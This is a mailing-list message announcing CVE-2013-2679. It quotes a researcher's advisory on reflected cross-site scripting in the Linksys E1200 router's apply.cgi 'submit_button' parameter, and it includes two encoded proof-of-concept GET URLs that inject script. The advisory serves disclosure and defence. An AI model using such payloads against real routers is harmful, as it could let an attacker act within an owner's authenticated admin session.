Mitre has assigned the following CVE for this issue: CVE-2013-2679
On Mon, Apr 29, 2013 at 12:27 AM, Carl Benedict <theinfiniteni...@gmail.com> wrote: > Summary > -------------------- > Software : Cisco/Linksys Router OS > Hardware : E1200 N300 (others currently untested) > Version : 2.0.04 (others currently untested) > Website : http://www.linksys.com > Issue : Reflected XSS > Severity : Medium > Researcher: Carl Benedict (theinfinitenigma) > > Product Description > -------------------- > The Cisco/Linksys E1200 N300 is a consumer-grade router, wireless access > point, and 10/100 switch. > > Details > -------------------- > The apply.cgi page, which backs all HTML forms on the device, is vulnerable > to reflected XSS via the 'submit_button' parameter. The vulnerability is > caused due to a lack of input validation and poor/missing server side > validation checks. This attack requires an authenticated session. This > application uses HTTP basic authentication. Because of this, there is no > session, which increases the likelihood of this attack being successful. > > Sample URL #1 (HTTP GET request): > > http://192.168.1.1/apply.cgi?submit_button=%27%3b%20%3C%2fscript%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E%20%27 > > Sample URL #2 (HTTP GET request): > > http://192.168.1.1/apply.cgi?submit_button=index%27%3b%20%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e%20%27&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&switch_mode=0&hnap_devicename=Cisco10002&need_reboot=0&user_language=&wait_time=0&dhcp_start=100&dhcp_start_conflict=0&lan_ipaddr=4&ppp_demand_pppoe=9&ppp_demand_pptp=9&ppp_demand_l2tp=9&ppp_demand_hb=9&wan_ipv6_proto=dhcp-tunnel&detect_lang=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&machine_name=Cisco10002&lan_proto=dhcp&dhcp_check=&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1 > > History > -------------------- > 04/26/2013 : Discovery > 04/27/2013 : Advisory released > > > -- > ∞ -- ∞